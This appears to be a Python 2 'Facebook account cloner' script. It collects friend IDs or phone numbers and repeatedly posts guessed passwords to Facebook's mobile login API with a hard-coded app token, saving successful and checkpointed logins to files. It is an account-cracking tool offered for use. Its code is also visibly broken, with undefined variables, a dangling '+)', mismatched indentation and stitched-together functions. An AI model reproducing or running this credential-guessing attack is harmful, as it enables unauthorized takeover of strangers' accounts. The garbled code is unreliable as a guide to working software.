# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
	print 'Thanks.'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;92m                     Please Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)




os.system("clear")
logo = """
\033[1;94m ######   #######  ##     ## #### 
\033[1;92m##    ## ##     ## ###   ###  ##  
\033[1;96m##       ##     ## #### ####  ##  
 \033[1;92m######  ##     ## ## ### ##  ##  
\033[1;91m      ## ##     ## ##     ##  ##  
\033[1;94m##    ## ##     ## ##     ##  ##  
\033[1;93m ######   #######  ##     ## #### 
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛      
\033[1;91m➙DEVOLPER   :    SOMI AWAN
\033[1;96m➙WHATSAAP  :   03455453538
\033[1;93m➙NOTE   :   USE FAST INTERNET
\033[1;90m➙NOTE   :   USE 4 TO 6 GB RAM PHONE
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛
"""
logo1 = """
\033[1;94m ######   #######  ##     ## #### 
\033[1;92m##    ## ##     ## ###   ###  ##  
\033[1;96m##       ##     ## #### ####  ##  
 \033[1;92m######  ##     ## ## ### ##  ##  
\033[1;91m      ## ##     ## ##     ##  ##  
\033[1;94m##    ## ##     ## ##     ##  ##  
\033[1;93m ######   #######  ##     ## #### 
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛      
\033[1;91m➙DEVOLPER   :    SOMI AWAN
\033[1;96m➙WHATSAAP  :   03455453538
\033[1;93m➙NOTE   :   USE FAST INTERNET
\033[1;90m➙NOTE   :   USE 4 TO 6 GB RAM PHONE
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛
"""
logo2  = """
\033[4;92mSELECT YOUR FAVOURITE SIM CODE \033[1;0m
\033[4;97mMOBILINK/JAZZ CODE HERE\033[1;0m
\033[1;96m00, 01, 02, 03, 04,
\033[1;93m05, 06, 07, 08, 09,
\033[4;97mTELINORE CODE HERE\033[1;0m
\033[1;96m40, 41, 42, 43, 44,
\033[1;93m45, 46, 47 ,48 ,49,
\033[4;97mWARID CODE HERE\033[1;0m
\033[1;96m20, 21, 22, 23,
\033[1;93m24, ??, ??, ??,
\033[4;97mUFONE CODE HERE\033[1;0m
\033[1;96m31, 32, 33, 34,
\033[1;93m35, 36, 37, ??,
\033[4;97mZONG CODE HERE\033[1;0m
\033[1;96m10, 11, 12, 13,
\033[1;93m14, 15, 16, 17,
\x1b[0;47m  \x1b[3;90mFACEBOOK ACCOUNT CLONER BY \x1b[3;90mSOMI STAR BOY\033[1;0m
"""


##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo
    print 47* '\033[1;97m.'
    jalan('\x1b[0;91m░██████╗████████╗░█████╗░██████╗░')
    jalan('\x1b[0;91m██╔════╝╚══██╔══╝██╔══██╗██╔══██╗')
    jalan('\x1b[1;91m╚█████╗░░░░██║░░░███████║██████╔╝')
    jalan('\x1b[1;90m░╚═══██╗░░░██║░░░██╔══██║██╔══██╗')
    jalan('\x1b[1;90m██████╔╝░░░██║░░░██║░░██║██║░░██║')
    jalan('\x1b[1;90m╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝')
    print
    jalan('\x1b[0;91m                 ██████╗░░█████╗░██╗░░░██╗')
    jalan('\x1b[0;91m                 ██╔══██╗██╔══██╗╚██╗░██╔╝')
    jalan('\x1b[1;91m                 ██████╦╝██║░░██║░╚████╔╝░')
    jalan('\x1b[1;90m                 ██╔══██╗██║░░██║░░╚██╔╝░░')
    jalan('\x1b[1;90m                 ██████╦╝╚█████╔╝░░░██║░░░')
    jalan('\x1b[1;90m                 ╚═════╝░░╚════╝░░░░╚═╝░░░')
    print
    print
    jalan('\x1b[1;97m⁅\x1b[1;92m1\x1b[1;97m⁆ \x1b[1;92mPAKISTAN\x1b[1;93mCLONING ')
    print
    jalan('\033[1;97m⁅\x1b[1;93m0\x1b[1;97m⁆ \x1b[1;92mEXIT')
    print
    print
    print 47* '\033[1;97m.'
    time.sleep(0.05)
    action()

def action():
    somi = raw_input('\n\033[1;96mTYPE : \033[1;93m')
    if somi =='':
        print '[!] Fill In Correctly'
        action()
    elif somi =="1":              
    	tik()
        os.system("clear")
        print logo1
        idt = raw_input("\033[1;96m[*] Enter ID : ")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+k + user + c +)
			op = json.loads(jok.text)
			print"\033[1;31;40m[✺] Name : "+op["name"]
		except KeyError:
			print"\x1b[1;92m[✺] ID Not Found!"
			raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
			super()
		print"\033[1;35;40m[✺] Getting IDs..."
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+k + user + c +)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="0":
		menu()
	else:
		print "\033[1;96m[!] \x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
	jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
	print
	print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
	print 42*"\033[1;96m="
	def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass

        try:
            pass1 = Somi
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + user + c + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;92m[OK\xe2\x88\x9a]  ' + k + user + c + '  ===  ' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass1 + '\n')
                okb.close()
                oks.append(k + user + c + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;93m[CP\xe2\x88\x9a] ' + k + user + c + '  ===  ' + pass1 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass1 + '\n')
                cps.close()
                cpb.append(k + user + c + pass1)
            else:
                pass2 = Somii
                data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + user + c + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                q = json.load(data)
                if 'access_token' in q:
                    print '\x1b[1;92m[OK\xe2\x88\x9a]  ' + k + user + c + '  ===  ' + pass2 + '\n' + '\n'
                    okb = open('save/successfull.txt', 'a')
                    okb.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass2 + '\n')
                    okb.close()
                    oks.append(k + user + c + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;93m[CP\xe2\x88\x9a] ' + k + user + c + '  ===  ' + pass2 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass2 + '\n')
                    cps.close()
                    cpb.append(k + user + c + pass2)
                else:
                    pass3 = Somiii
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + user + c + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;92m[OK\xe2\x88\x9a]  ' + k + user + c + '  ===  ' + pass3 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass3 + '\n')
                        okb.close()
                        oks.append(k + user + c + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;93m[CP\xe2\x88\x9a] ' + k + user + c + '  ===  ' + pass3 + '\n'
                        cps = open('save/checkpoint.txt', 'a')
                        cps.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass3 + '\n')
                        cps.close()
                        cpb.append(k + user + c + pass3)
                    else:
                        pass4 = Somiiii
                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + user + c + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                        q = json.load(data)
                        if 'access_token' in q:
                            print '\x1b[1;92m[OK\xe2\x88\x9a]  ' + k + user + c + '  ===  ' + pass4 + '\n' + '\n'
                            okb = open('save/successfull.txt', 'a')
                            okb.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass4 + '\n')
                            okb.close()
                            oks.append(k + user + c + pass4)
                        elif 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;96m[CP\xe2\x88\x9a] ' + k + user + c + '  ===  ' + pass4 + '\n'
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k + user + c + '-\xe2\x80\xa2\xe2\x97\x88\xe2\x80\xa2-' + pass4 + '\n')
                            cps.close()
                            cpb.append(k + user + c + pass4)
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()

